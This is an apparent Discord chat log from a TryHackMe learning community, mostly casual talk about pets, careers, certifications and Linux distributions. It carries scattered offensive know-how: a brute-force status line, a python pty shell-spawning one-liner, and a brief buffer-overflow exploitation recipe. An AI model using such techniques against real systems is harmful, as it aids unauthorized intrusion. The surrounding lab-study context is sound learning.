#thm-community-media
1 messages ยท Page 31 of 1
mhm
it was my bad, i did something wrong that fucked it up, already fixed it thank you
๐
Chev is always around when someone mentions burp ๐
lol
I have two of the top right ๐ถ
https://www.thesprucepets.com/thmb/bSczBw3e3gn9G4y_bGEstG46cfw=/960x0/filters:no_upscale():max_bytes(150000):strip_icc():format(webp)/16_Love-5bb4c12bc9e77c00263933b3.jpg I'm after a German Shepherd, we're just waiting on the breeder at the moment.
Ugh updating my CV, hate writing about myself ๐ฆ
you shouldn't lol
those are your own achievements and you should be proud of them ^^
Oh I am, although I'm just writing my personal statement and I'm like 'Adam is....'
sigh
HIGH
i don't use my name in personal statemnt
@
LOL
Bruv so what id is yeah is like I am the shit so hire me yeah get rid of the rest of dis tools.
you need to use the sentence I haz experience so gibe mi di jab
๐
@quaint elm I fell asleep, srry
It didn't end well anyways.
@graceful coral Same here uupdating my cv and I have no clue on how to put the formatting & style together.
anyone notice cloudflare poop itself
They're having a major outage atm
Welcome to Cloudflare's home for real-time and historical data on system performance.
Top of the day to you lads
Dammit
Evening
@regal socket
gotcha
^^ amazing
That's literally koth in a nut shell
@crude agate - VC quickly? Seems weird you cannot find the account
if anyone is up for some overwatch tomorrow let me know ^^
Hi there. I'm kinda newbie into this stuff of CyberSec. I'm currently doing my bachelors in CyberSec. Is there any specific cert(s) that I can do that is amazing for a beginner and provides hands-on practise and isn't too harsh on the wallet. Thanks in advance.
"Cert" and "Not harsh on the wallet" tend to be mutually exclusive I'm afraid...
The CompTIA certs tend to be Ok for price
Which CompTIA would you recommend? Security+ or PenTest+?
I am not the right person to ask here, given I don't have either
https://discord.gg/sc3xyH
That's a link into the CompTIA discord server
Good place to ask for things like that ๐
Ok. Thanks mate.
Man Fed just had to gift 320 subs to his own chat ๐
Is it true that discord is under surveilance?
lmfao
No fr is it ?
now the lmfao looks out of context without the pic you posted
those guys were probably messing with you @graceful coral
but discord itself may be under surveliance
Thats liturally what i just asked ๐
they likely will give over their logs if the fbi asks

but I don't think you have to worry about discord watching you
Discord is watching me omg

They'd better not be showing their fbi buddies all my memes and taking credit for them
guys is it a good idea to show your vulnerabilities in a relation ship or does that bite back and your partner tries to exploit it using metasploit
haha
I find releasing them one bit at a time over the years is better.
That way they are locked in ๐
It's a pickle
guys is it a good idea to show your vulnerabilities in a relation ship or does that bite back and your partner tries to exploit it using metasploit
@fringe kettle If they can exploit you, marry them.
i can't marry my stepdad :c
Move somewhere else.
is he hot?
my stepdad? not really..
hmmmmm. i say patch your vulnerabilities before another one get exploited
I dont think you can afford your data being spread online
i do agree, with that
but the more i patch
the more vulnerabilities i find
damn this convo did take a really weird turn
plus i don't have a stepdad
and he doesn't exploit my vulnerabilities
(at least not yet)
lol i love it when conversations get weird
you get to experience what you never experienced before
hows your uncle by the way
do they still pentest you
Pg13.
lol srry
Not myself. But the organisation as a whole yes
I think we should cut this otherwise I'll get either muted or banned by @tropic lava
yea i agree
i really want to make more jokes but i dont want to be muted
i have alot of jokes in my head but they are all adult jokes
so best not to say them
Agreed
I want a cat ๐ฆ
Reminds me of chernobyl
lol @olive sundial
I'd call my cat Mr Cat
@graceful coral its been settled im your cat
Here
#CatNamesWorldCup - Round of 16, match 1
Please vote now and then RT so others can join in:
206
111
Vote for your favourite catname
can i nominate my name
my original name was nut------ but i was told by the admin to change it to netbuster
Go ahead. Not sure how it works to be fair
oh dear
Yeah, welp
haha
I was always a fan of Deadmau5's cat name Meowingtons
You could also have these though:
Cat Stevens.
Ali Cat.
Cat Benatar.
Cindy Clawford.
Meowly Cyrus.
Oprah Whisker.
Pawdry Hepburn.
Fleas Witherspoon.
What do you think @olive sundial
Pawdy Hepburn works just fine ๐
I'm a fan of Oprah Whisker and Fleas Witherspoon.
I'd call my cat Mr Cat
@graceful coral I remember there was a cartoon show named Kid Vs Kat, where the protagonist sister named her cat as Mr. Cat.
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344354 to do in 5433:29h, 4 active - it's going to be a long few days ๐
Oh my
Every time it outputs a status message the time goes up too.
D:
Think I'm barking up the wrong tree.
ha
I've got a surprise lined up for optional aswell when he next appears
Sounds a bit ominous..
Unfortunately it's nothing exciting, he just gave me a script idea so I threw it together
I swear if itโs the file system spammer
๐
Hey lads
Evening
What you guys think of fish shell ?
Hello everyone!
Okay okay I know what you're thinking.. Hayley.. what the hell is this??
BUT HERE ME OUT I made this a fun relaxing video! Pinky promise! :D
Oh and also, I'm still vegan and consider cow milk a big nono for multiple reasons :)
Hope you enjoy the video and h...
what ive been longing for
What cursed thing have you brought upon this land?
I'm beginning to understand why you have the 'nick' you do now @graceful coral
What a chuff have you been watching..
Think that's a good sign for me to log off for the night
@graceful coral enjoy I guess?
lol
Haha
What cursed thing have you brought upon this land?
@graceful coral well said ๐

Don't mess with my Frenchie
You know you are tired when you scan your own webserver for xss
lol
@olive sundial kek
You're usually awake when I'm on in like 8 hours
Get to bed
oh dang really

test
@olive sundial who is your frenchi
@lethal egret needs a bird person emote
U :( @graceful coral
hi
been off sick, and loving the site joined 6 days ago ๐
looking forward to learning loads here
Welcome ๐
i'm crying ๐
Ouch!
OH NO
Ok thank god
Macro stuff is due Sunday at midnight
My history is due tonight at midnight
that is very fast
Reminds me of back when I installed Gentoo
I was downloading in litteral bytes per second
Linux distro
hello lads
does anyone know any good blue team labs
even in other sites I cant find anything blue
except reverse enginnering
https://zoom.us/j/96161472906?pwd=NWl2c3QrN2lpWElUc05YdnhPN0pDUT09&fbclid=IwAR2T4xvhaM7LPlDrcdenZQGTuMfJeSVSQY2PWIkA2uV_ru-YxWomBMEo_ow - Off topic but us guys from https://www.facebook.com/groups/thisisanitsupportgroup are on a zoom metting happy hour
Come along
Any vim fans awake ?
VIM!!!!
Found out how to copy 2 lines, now im puzzled with cutting 2 line
FYI. i never ask here a question before wasting 30-60 min on google ๐
sometimes due to too much of inf i get confused
done.. i really wasted more than 1.5 hour on this 2 questions.. maybe cuz its too late of the night ๐
only by narrowing down google search i could find the answers
All information can be found if you look hard enough ๐
finished Vim room.. conclusion ? never gonna use it ๐
so i heard
but I find it very brain*******
Seriously
Vim is wonderful
When you use it properly it speeds everything up so much
Don't take credit for my stupidity @formal sparrow
You didn't trap me in vim, I trapped myself
๐
๐
is it a bad habit to use -A with nmap ?
It's loud
in other words, if i would scan a normal website i would get blocked real fast ?
Guys, quick question
Does anyone have a braille to english OCR tool?
Asking for a friend
up to this moment i had no idea what breaille is, so I dont know
You might get a better answer @hexed thicket -- this is just from a Google search, but does this help? https://github.com/MUSoC/Braille-OCR
Assuming it's not that easy..
I tried that, looks like a person project and isn't really designed for use outside theirs
You'd be surprised, I found nothing except a few small projects I couldn't get to work
Odd. Well, I got nothing then ๐คทโโ๏ธ
You're the Python expert around here I'm afraid -- if you're lucky someone might have something though
joker room is Powered by Hacking Articles ? ๐
I really like that site.. so much good info on it
lol got new level, and im still wizard..
so not funny
I was supose to be master by now
hey, does anyone know where I could find information about how nation states (i'm researching the iranian government specifically) can just hack facebook accounts. Like what are the advantages that an government might have over just rouge malefactors
Personally I'd say Google would be your best bet.
I realise that's probably not the answer you're looking for however that's likely where you will get the most information.
I'd also look up Edward Snowden as he mentioned a lot about 'collection programs' although I don't believe it was specifically on Iran.
More so the US population.
noot
@graceful coral Advantage is far more money and time and a more focused talent pool. They don't just do an attack they do a campaign on their targets. Any way is a way in.
@graceful coral Add me to your profile nootings
yeah, the government is gonna have much more resources than your average pentester/pentest group
also will hold on to any 0days they find for future use
They would also have leverage to straight up ask the corporation for certain details
rather than report to bug bounties
or otherwise disclose it in any way
they have more to benefit by keeping it quiet. Rogue groups rarely can afford that luxury
iranian government becomes number one on hackerone
LOL
"Hey guys we're dissolving the team"
"Heres all the 0 days we found though..."
Why ? I mean why are they so interested in Iran ?
whos they
the guy that asked
@graceful coral
ah
I am tired and unable to keep the same train of thought for more than 15 seconds
the guy that asked
@graceful coral That guy, and the site you mentioned hackerone(cuz you said it becomes nr one on their list )
oh, just thinking of doing an essay on it
Then I would suggest if you haven't already that you watch the film Snowden as that will certainly open your eyes in terms of what a powerful government can do.
Who pinged me 4 times then deleted the message?
Heyo pars
@tropic lava I did, no one answered me, I even said hi and no one said hi back ๐ฆ
@tidal hemlock hi
hello ur the only sane person in this server
@tidal hemlock Hi
hello ๐
Hi!
hello
๐ฅฎ
๐ฐ ๐ฐ
@nova lynx psst you awake
@graceful coral now I am
lol
@nova lynx permission to DM
@tropic lava -- if and when you get a moment, fancy talking Thinkpads?
As a really preliminary thing, I was looking at a new T495s
Not least because they seem to play nice with Linux
I seem to remember you saying that some older ones could be really nice though?
The Ryzen ones are pretty nice
wait I could buy a laptop because I'm not paying rent anymore
Haha
Yeah, I'm thinking Ryzen 7 Pro 3700U
Pars is pushing to wait for the ROG Zephyrus G14, which honestly looks absolutely awesome
Preliminary reports are that it does not play nice with Linux though
But yeah wait for Ryzen 4000 mobile
It's Zen 2 (Desktop 3000) based so great single core gains
It sounds really good. Literally my only qualm with something like the Zephyrus is potentially being stuck on Windows
Not sure I could cope with that for a daily driver
I'll wait a while, I think, and assess it in August maybe, when they've been out for a while
Did you say you recommended some older ThinkPads?
Tinkering, mainly. I fancy picking up something older that's nice and upgrade-able. Might be better going for something new as a daily driver though ๐คทโโ๏ธ
Mainly asking because I seem to remember that's what you're using?

Pars is pushing to wait for the ROG Zephyrus G14, which honestly looks absolutely awesome
@formal sparrow Looks sexy as hell!
It looks absolutely gorgeous
And those specs, oof
Literally my only qualm is that it really doesn't seem to like Linux
It's not Ryzen but have you considered a Dell XPS laptop, I've just ordered one to work from home with and they are handy little things.
Even if you bully it into working, the battery life seems to go down to two hours
I have not
Currently on an older Dell Inspiron
Absolutely love the thing to bits
Think it's time for an upgrade though
It's very nearly 8
Oh wow.
Why don't you get the ROG and just run a VM on it.
It's not ideal I know but..
Specs were good enough back then that it's still more than manageable now, and I do love the thing. Just starting to get problems
That would be because I really dislike Windows as a daily driver
It's unwieldy
Ah.. ๐ฆ
My Desktop runs it, mainly because it's a powerhouse that I don't do any real technical work on
I use it for VMs, very occasionally games, and watching films if I ever get the time
Plus things like photoshop or video editing
Anything actually to do with computing I use my laptop
Wouldn't have that option if both were on Windows
Don't know what to suggest then ๐
I'm going to try finding something that's powerful and works nicely with my beloved Linux
That T495 seems to do the trick, especially using something like Arch
If the Zephyrus starts working better when the updates start coming out
Well, that'll be at the top of the list
It's such a gorgeous machine
@formal sparrow someone just told me I can use git and LaTeX and this is what I need in my life.
Why didn't I know this before?
Love LaTeX. Saved me so much time in grad school lol
did some1 say Ryzen ? ๐
Love LaTeX. Saved me so much time in grad school lol
@hallow hound Latex and school.. what have they in common ?
@last marlin I had to type a lot of quantum equations for my thesis. Doing it on Word was a pain in the ass.
Ow you mean sofware ? ๐ I thought we were talking about latex , that you can wear ๐
OHHH hahahah
๐
HAHA that's so funny. 
HAHA that's so funny.
@hallow hound sorry my mind must be in the wrong place after weekend ๐
It's all good, bud. ๐ Hope it was nice, being in quarantine and all.
It's all good, bud. ๐ Hope it was nice, being in quarantine and all.
@hallow hound ofc there are no clubs open, but hier in Holland, we dont have to sit at home.. you see a lot of ppl in park picnicking under the sun.. ofc gov advices to not leave your home without a good reason, but nothing stops you to go outside and have some good time
@last marlin Holland! So cool. I'm in California right now. I think people are very stir crazy and starting to leave the house too. Notice a lot of traffic today when I went to the market.
@last marlin Holland! So cool. I'm in California right now. I think people are very stir crazy and starting to leave the house too. Notice a lot of traffic today when I went to the market.
@hallow hound its not easy to stay at home all the time.. im not much of an outside guy, but still, sometimes you want to go outside, especialy with this nice weather
@last marlin Hehe. I've been to the Netherlands twice in March and... Denmark once for the summer. I was lucky enough to experience nice weather. Although, I think it was very windy at one point while I was camping on the beach. People should be able to leave just a little bit, as long as they practice the six-foot rule.
@hallow hound Wind is a part of Netherlands.. I'm livinf in rotterdam so we have a huge river in the city called "Maas" so wind is every day thing for me ๐
and rain t oo
it can rain up to 5 times in a day here and still have a sunny day at the end ๐
@last marlin Oh my goodness. I mean. We can average out the weather between our locations and get a happy medium. Californians have drought, you know.
hey guys i need some advice
hehe. ask away. I'm kind of a n00b, maybe our boy @last marlin can help :x
@last marlin Oh my goodness. I mean. We can average out the weather between our locations and get a happy medium. Californians have drought, you know.
@hallow hound never been in US..
hey guys i need some advice
@winter thunder im not sure i can help, but ask away.
@last marlin Well if you like nice weather, come on over! If you like surfing, SoCal has a whole bunch of spots.
@last marlin Well if you like nice weather, come on over! If you like surfing, SoCal has a whole bunch of spots.
@hallow hound I doubt it will be this year.. I have a mission for this year, to get OSCP cert. will be doing a lot of study.
Hope im not shooting for the stars when i say this year ๐ I know its not an easy thig to get
@last marlin Understood ๐ Good luck on that. I believe in you!
PFt. I'd fail it for sure.
Tbh, cyber is probably one of the toughest subjects for me. Chemistry is less complicated compared to cyber x_x
im a 23 year old college student doing a degree. Informatics and Security is the name of my degree but my program's structure is a mess. I have failed some courses in this program before so I had to wait a year to take it again. Some of my profs are nice but most are not good at teaching some dont even teach. Since the program is a degree I know that there is high expectations from the students. but for someone like me who didn't have a good foundation in IT, i find it hard to catch up. I really like this field but because of my situation and experiences at the college made me feel depressed and not motivated. What should I do?
PFt. I'd fail it for sure.
@hallow hound https://youtu.be/BxY_eJLBflk
In delivering the commencement speech at Dillard University, Academy Award-winning actor Denzel Washington told the college graduates to put God first in everything they do, adding that everything he has accomplished in this life was due to the grace of God.
โฉ SUPPORT THE CHA...
@winter thunder I'm going to message you privately ๐ But you answered a very important question. You like your degree and that's the most important thing.
im a 23 year old college student doing a degree. Informatics and Security is the name of my degree but my program's structure is a mess. I have failed some courses in this program before so I had to wait a year to take it again. Some of my profs are nice but most are not good at teaching some dont even teach. Since the program is a degree I know that there is high expectations from the students. but for someone like me who didn't have a good foundation in IT, i find it hard to catch up. I really like this field but because of my situation and experiences at the college made me feel depressed and not motivated. What should I do?
@winter thunder This is a topic you must discuse with your father maybe, you are asking life advice, i wouldnt dare to advice someone to give a life advice, but one thing for sure, i have drop from study long time ago, and i regret it deeply, so my only advice is, finish what you started and try keeping up the things you love, im currently working 9 h a day, i sleep for 4 hours and the rest of the day i try to dedicate to a study.
@winter thunder Hey man. I'm going to not give any real advice but I can give my personal experience. I left college after two years to take a job doing infrastructure/helpdesk. I did it for two years before I was recently offered a security engineer position. I don't regret taking the job but I do regret stopping my degree when I only had 2 years on it left. It's worked out for me but only due to hard work. To get to where I am I had to go way above and beyond the scope of my job and learning to automate things while implementing systems all while on an apprenticeship getting paid the same amount as when I worked in a grocery store.
My evenings are spent studying for a degree, volunteering for a cyber security charity and learning whatever I can on THM and other platforms. Personally I wish I had finished my degree while I had the time. I'll still get a degree but it will take me 4 years now.
@last marlin Agreed about the life advice thing, I'm not going to weigh in on that either, just giving my experience on the subject
well said ma man @graceful coral
@hallow hound California is on me and my partners list of places to visit but it won't be for a few years due to other trips lol
@graceful coral have you done room Game Zone ?
Thank you guys. i shall find my path soon
Iโve not done that one unfortunately, might take a look later
Iโve not done that one unfortunately, might take a look later
@graceful coral its an easy one, but damn, that last question is hunting me.. cant seem to figure out what payload to choose, you would think thats an easy one, but whatever i choose i get en error
was hitting the wall so i decided to surfe on web, found out that this course is better than OSCP, what you guy think of it ?
CISSP?
that's more for people that are interested in management
and CIO
so if you want to move away from hands on stuff this is the cert for you
I was wondering, what course could i take before trying for OSCP
a lot of them, lol
try elearn security
i might go for the next level in a month or so
Isn't CISSP require 5+ years of IT experience?
Isn't CISSP require 5+ years of IT experience?
@quaint elm no idea
@quaint elm Certifications say you should have a certain number of years or other set of skills to be comfortable with a certification.
With the CISSP, they have particularly strict rules. It's a certification geared towards experienced cybersec folks with real experience in several different operational fields. In order to confirm this you need to undergo a validation/endorsement process. they have all the details on the website.
You can take the certification exam but in order to be fully certified you need to be validated. You also have to pay an annual maintenance fee and regularly show that you are taking further training/certification by undergoing courses/exams at registered organisations like Cybrary, Offensive Security and others.
The CISSP is ideal for experienced security practitioners, managers and executives interested in proving their knowledge across a wide array of cybersecurity practices.
Has anyone had jobs in this field? I'm coming from a web developer into infosec. I'm wondering the differences. For example, a junior level developer could perhaps build a simple, static website. A senior, though, could build the backend, link it with a database, implement authentication, etc.
So, is there a junior/mid/senior level in this area? What are they supposed to know(at the levels)?
Not that I'm interested in a job. I'm just curious.
@real bobcat
huh?
damn these made me cry ๐ข
๐ฐ ๐ฐ
@winter thunder I have graduated from colleges in the same situations you have experienced with really bad professors that dont care
It's alright, I think as I am in a similar situation, it doesn't matter how they treat you if you treat yourself right then it really doesn't matter how other responds to. If you really do love infosec, give it your all, make sure it worth in the end.
dude its not about how i was treated
@quaint elm its about the money i paid
and didnt really learn anything new
If i new better I would have just taken certs
instead
Well, is it going to come back?
๐ข
Oh god all that money wasted
I owe 22 thousand dollars
as a result of this
Exactly, that's what I am saying. Thinking about it will only make you feel frustrated.
You owe $22K -_-
yea
And i cant get a job entry jobs and internship is not alot in my state
now im sitting in my moms basement
thinking about working minimum wage
or opening a business online
with free hosting
and i am also learned how to make android apps and investing in that
making apps for googleplay with too much ads
and i also learned*
damn i cant type when im in emotional distress
if it makes you feel better in UK universities costs way more, it's around ยฃ10k a year depending on the uni and what you are studying
well, try getting the most experience you can for now then think about what else to do in the future
if you have a goal well defined, no matter how hard it is to achieve it, you will eventually get it
i was in doubt a few months ago if security is what exactly i wanted, but then went straight on learning and now i am very certain about it.
everything can be disappointing at one point or another. but the only thing that makes it worse is yourself. you put it hard on yourself. knowing it's not your fault. What i do in these cases: make the best you can out of the worst situations
UK does have a lot of programmes to get a degree without paying though. It might just be Scotland but here the government will pay for a 4 year degree. Lots of people still take out loans but it can be done without it. There's the graduate apprenticeship program too which is fully funded by the goverment and you get a degree out of it
Hey not sure if this here or not.
I just started the Nessus room and it suggests creating an Ubuntu box just for Nessus scans.
Just wanted to find out before I carry on as to why this is.
Is this not something I should have on my Kali VM?
Level 4 apprenticeship in UK sucks big time.
Level 5 and 6 are good though
The level 4 is with BCS which are a pile of humpty dumpty that don't know anything about security and trust my word on that.
Graduate level apprenticeship you go to uni and stuff while still working and get a degree after 4 years
A lot of the programmes are quite good
Getting a degree with it through open uni at the moment and it's not too bad. I've not really learned much but I really only want the degree
Plus most of the benefit from an apprenticeship is the on the job experience you get
Same. I am doing both an apprenticeship, uni and working full time
But level 4 is just bad lol
Are you in england? Not sure the numbering system translates which is confusing me a bit.
As I did a regular apprenticeship and my coursework was level 6
then there's a level 8
and the level 10 is a graduate apprenticeship which gets you a bachelors degree
Must be a different system lmao
it is haha
Yeah sounds like Scotland are doing wacky things. When I did my regular apprenticeship I did the coursework in 3 weeks
Lmao
This is why people should use already trusted communication severs like discord
i doubt that teachers would use discord ๐
just a quick question, Whats the best os to daily drive, windows, linux or mac...im struggling to stick with on because i like aspects of all 3 - what do you folks use
"best" is subjective
highly depends on your daily routine
I daily windows because I game. For productivity, I use Xubuntu.
have anyone tried โowasp webgoatโ? I am searching for similar VM ..... explanation and practice included like this web goat .....(not searching any paid lab).... but i canโt find..... anyone have any suggestions?
Kali, all day every day..
Arch > *
Parrot > Kali
@pale cove Why ? cuz Parrot is lightweightโ ?
I have pretty good machine, so im not looking for lightweight
maybe its a better option for older PC's
Parrot is less light than kali, surely?
i like kali, so many forums say you cant use it daily..
Kali is a pentesting distro, it is not a daily driver.
i like kali, so many forums say you cant use it daily..
@arctic imp Well, im using it day and night
the only time it failed on me when i accidently removed gir1 lib
Btw any of you have linux loading via UEFI >? I do not have win on my machine, so i feel like i dont need grub
i tried ubuntu but my graphics card made it so laggy, recently ubuntu doesn't seem to like NVidia cards..
Kali Linux โ
Graphical Acceleration Required.
Minimum 1GB RAM is required.
Minimum 1GHZ dual-core CPU is required.
It can boot in legacy and UEFI modes as well.
At least 20GB of hard disk space is required to install the operating system.
so it is possible, but have no exp in that area..
not sure should i do it or not
it's not hard to install
I would like to do it withou reinstalling my system
@pale cove Why ? cuz Parrot is lightweightโ ?
@last marlin
- Parrot is way more stable
- Has wider range of pre-installed tools
- Wonderful "Home" edition
- Always had non-root user by default
@last marlin
- Parrot is way more stable
- Has wider range of pre-installed tools
- Wonderful "Home" edition
- Always had non-root user by default
@pale cove it is hard for me to believe that kali is not stable.. i maybe we understand word stable diffrently. anyways. I'll stick to Kali for now, But wont say no to Parrot if you are advicing it.
another Question, what will happen if I delete grub ? ๐
I have notice loading via bios, I didnt see grub.. so does it mean if i delete grub that it will just load via UEFI ?
You either need to keep grub or switch your bootloader to something like rEFInd, other wise your pc doesn't know what to boot
You either need to keep grub or switch your bootloader to something like rEFInd, other wise your pc doesn't know what to boot
@cobalt thicket any chance to avoid seeing this ? and make linux just load after bios ?
I have set the timer to 0, but still i see it loads for a sec
but when i go to bios and choose boot kali, I dont see this blue screen
hmm i've seen blackBox many times on different forums and it's kinda rated top #3 distro for pentesting
Kali is #1 and Parrot is #2
Backbox is a nice slim distro
definitely missing some key tools
but it doesn't scream PeNtEsTiNg
Having used all 3 I have to agree with @pale cove for me it's Kali, Parrot then Backbox.
well i have to say im new to this, ive built websites for years but not really felt satisfied, but this has been really good so far
Glad to hear it @arctic imp
Hey can someone recommend cheap a NIC with Monitor and Injection mode?
Future community mentor^
ummm guys, anyone can help me on ls stuff ?
why i need to do ls ../ to show directory ?
while i cant cd .. to back parent directory?
Try python -c 'import pty; pty.spawn("/bin/sh")'
@tropic lava cd ../ <-- for what? sorry i dont know for that command...
You don't know CD?
Basically
but ../ <--- first time i saw
So who here makes a living of hacking?
๐
Iโm working to finish OSCP certificate and want to know if that is a good start to find work or I have to do maybe other certs?
@muted bramble Although certifications do stick out alot more than a degree from college, employers also really want to see experience as well. You could certainly do OSCP as your first cert but that may be a bit much if you are just starting off. If its your first security cert, I recommend Security+, GSEC, etc.. I personally got my certified ethical hacker prior to OSCP but that was back yonder as I am CISSP-ISSEP now. it all boils down to what you are specifically wanting to do in a job. Do you have previous work history in IT or security?
ummm guys, anyone can help me on ls stuff ?
@native wren ../ is the simbolic path to the parent directory lad
@slender gulch oh hey you're here man
Codecademy got a good course on UNIX command
@steep scroll
bruh
Get the piece of paper that the jobs in your area need
Oh hey man lol. You still doing code academy? I've actually been working on my own platform for teaching info/cyber security to people but its going to be more directed towards one-on-one and small groups as I will be instructing live and then having labs for the people learning. @steep scroll
@slender gulch I quit Codecademy bro, now I'm learning on TryHackMe
Ahh, so this is a learning environment then?
Yes
You should check it, it's very well made lad, even trough I think you need more than one websites and courses to grasp hacking and all it has to offer. (even trough bug bounty will be the main goal) @slender gulch
@slender gulch I kinda want to test the beta of your platform lad, i'm willing to pay to be honest
Tell me mow bout it
What you doing? @olive sundial
Not much @quaint elm , just got a few Teams meeting with some client currently
Oh, work.
How do you configure smtp server in nessus correctly?
otherwise i can't pay for my studies and certs
@olive sundial True enough
Yess lool
๐ฐ ๐ฐ
yeah, seems very live this channel
does anybody know which hash algorithm pi hole uses to store passwords?
ok
thanks
any idea what hash type this is "173af653133d964edfc16cafe0aba33c8f500a07f3ba3f81943916910c257705" ?
/etc/pihole/setupVars.conf
yes i found that path but i need to know what hash algorithm it is
bcs i know what i set as password
123
lol
and that whats safed in the file "173af653133d964edfc16cafe0aba33c8f500a07f3ba3f81943916910c257705"
Sha256 ?
@pale cove Hey dude, after you made your points about Parrot, I kinda wanted to test Parrot, so I installed it.. hope im gonna like it )
I'll defend parrot over kali
@pale cove Hey dude, after you made your points about Parrot, I kinda wanted to test Parrot, so I installed it.. hope im gonna like it )
@last marlin let's go :)
you are going to love it!
also try customizing the MATE terminal
transparent background looks really good
@last marlin let's go :)
@pale cove I will say one thing, I love this community, so anything that will be advcie to me, least i will do is test.. for now im just installin software. I have chosen KDE, loved it lately, btw was advcied to me just like you did Parrot ๐ I have installed deepin-terminal. but will see how mate terminal looks
good! i really like that attitude!!
treating stuff as an advice and actually forming a personal opinion after testing is insanely good social quality!



๐
It's all about finding what you like
oh yeah ^^
First positive thing, in kali I would have to add kernel parameters to grub for my AMD R9 390 (otherwise I would get black screen every 5-10min) in Parrot i have changed nothing yet, no black screen at all
Keep posting. I'm thinking about switching to parrot
Kali also had some problems with my WIFI adapters while parrot instantly understood them and installed everything needed
there's a lot of this small stuff which makes me like parrot more
In Kali I have to restart the Bluetooth service every time I boot up to connect my headphones. That's inconvenient
Are you daily driving kali?
Yes
@tropic lava just to let you know I figured it out :D (two rounds of sha256)
That's disgusting
It was root default when I installed. And yes it's 2020.1 now
Don't use root user for daily driving
Yes. I have created non root account for daily driving
In Kali I have to restart the Bluetooth service every time I boot up to connect my headphones. That's inconvenient
@fair shell I would have that problemem with my wireless sub woofer, but I made bluetooth servers run automaticy, after that after i turned my speakers on it would overide my headphones, make your bluetooth services run at startup, Stacer is a nice app to do that.
non-root is safe
Don't use root user for daily driving
@tropic lava I think some programs even dont work properly wth root user
chrome comes to mind
Chrome/Chromium, a lot of programs also display warnings
but if you make a simple user dont you have to configure other things too. I had a feeling that Kali was never designed to be safe.
ahh ok, pardon didnt know that
@fair shell I would have that problemem with my wireless sub woofer, but I made bluetooth servers run automaticy, after that after i turned my speakers on it would overide my headphones, make your bluetooth services run at startup, Stacer is a nice app to do that.
@last marlin thanks I was thinking about cronjob
Bluetooth service is already running after boot up. But doesn't detect my headphones. That's why I need to restart the service. And there were other issues with wireless device. Had to google for quite some time to resolve.
@fair shell btw, could you send a screen of default fonts in kali ? I have this feeling some fonts a too small, would like to compare them with parrots fonts
non-root is safe
@pale cove Did a start up test, 11.08 sec. im not sure how long it was by Kali, but not that quick..

twitch.tv/xt3r casual streaming
mr robot ctf atm
if anyone wanna watch and help XD
:jump:
@pale cove lol
yea, been pretty busy. 2020 is the year everything changes for me
awww how come? hope you've been okay
I would google this but i dont know what to look for. As you can see on the screen there are 2 shells, default one and below is the fish shell. Is it pssible to keep the above form and still use the fish shell ? what should i look for if i wanted to google ?
Thank you i will see what i can do
u might benefit from this https://explainshell.com/
match command-line arguments to their help text
u might benefit from this https://explainshell.com/
@fair flower thank you this is an awesome site
match command-line arguments to their help text
the prompt is stored in .bashrc
@urban crescent If i make changes in that file, does it affect fish shell ?
@urban crescent @fair flower Thank you for your input, WE did it.
@muted bramble Although certifications do stick out alot more than a degree from college, employers also really want to see experience as well. You could certainly do OSCP as your first cert but that may be a bit much if you are just starting off. If its your first security cert, I recommend Security+, GSEC, etc.. I personally got my certified ethical hacker prior to OSCP but that was back yonder as I am CISSP-ISSEP now. it all boils down to what you are specifically wanting to do in a job. Do you have previous work history in IT or security?
@slender gulch
thank you Leroy no I donโt have any experience working in IT security and yes Iโm basically starting off but Iโm really at it and love it... so what you think would be a good way to plan certs? Start off w ethical hacker gsec and sec+?
@knotty knot
@tropic lava thank you so much ๐
Headphones
@lethal egret You learning buffer overflows?
Only basic
Just need to know enough to get through oscp
then I can ignore it again
yeah x86
God help you dude.
They aren't that bad xD
@lethal egret Lol buffer overflows are a blast.. ish... sometimes.. haha. Do you know any C languages, perhaps any assembly, or how stack with memory works?
Actually, let me take a step back. Do you have any experience with code execution (arbitrary) and privilege escalation? Those couple of things as well as what I mentioned above are some items that you need to be familiar with when working with buffer overflows.
He's very much familar with those stuffs, afaik.
optional why are you like this
@slender gulch interesting, mind if we open small discussion on assembly
code execution is a myth created by the government
optional why are you like this
@urban crescent can you help me learn code execution?
Damn yall are straight speaking foreign, those two words together don't even make sense
overwrite the buffer, identify the offset of the eip with pattern create, jump to a location in memory where you'll be able to execute your shellcode, detect bad chars, gen shellcode, ???? profit
but sir
I don't know privilege escalation
sir
will this give me default user?
hey I have a question about VPNS I have NordVPN but I don't think you should use virtual private network service provider so I don't really know if I can use it
Does anything give code execution ๐ง
Oh wait, I forgot. optional just started learning hacking few weeks ago, iirc.
overwrite the buffer, identify the offset of the eip with pattern create, jump to a location in memory where you'll be able to execute your shellcode, detect bad chars, gen shellcode, ???? profit
@urban crescent Hope it was that easy these days, "Smashing Stacks for Fun and Profit".
nteresting, mind if we open small discussion on assembly
@fast flint Go on.
To give small history I have done some Assembly Programming on different MC and M by OEM like ARM
Noticed different OEM uses different command eg mov A,#01 = LD A,01
Letโs some your trying to attacked these machine with buffer overflow how you would approach it
No experience on ARM.
Alot of newer Iot devices are on ARM
Potential exploits ๐ง
Just broke dogcat exploit trying to automate exploit ๐ time to restart
@fast flint Yeah no problem at all. Im more than happy to help out with anything!
Im headed home from the office now, going to stop a pickup some breakfast and then ill be back on the computer and can help
@slender gulch looking forward
@fast flint Im online
@slender gulch welcome
Were you wanting to do voice or did you have just a couple questions?
Before we start i am coming from EE eng maindset
@slender gulch couples
Correct if i am wrong how memeroy handle ibstruction either FIFO or LIFO and so on
Will that impact how we develop the exploit
@fast flint can you do voice?
I think I understand what you are asking. So there are two types of buffer overflows per say. You have the commonly used stack based and then there is heap based. Regarding LIFO and FIFO, Stack is LIFO and Queue is FIFO. So when creating your exploit/payload, you would need to ensure you are targeting the proper data buffer. @fast flint
I am back
Did my response above answer what you were asking? If not, if you could elaborate in detail a bit more that would be great
@fast flint awesome! Let me know if you have any other questions ๐
do not want to waste your time I will be reading more ๐
@fast flint Certainly not wasting my time at all. I enjoy helping and teaching others. Please dont hesitate to ask ๐
InfoSec/CyberSec (IT/Computers Overall) isnt just what my career is in, but its also my passion and I enjoy all aspects of it including teaching. As they say, you never work a day in life loving what you do.
@slender gulch well said. I choose my major because I book called Z81 Assembly.
The programming in was hard any mistake and you have to do it from start but it was fun.
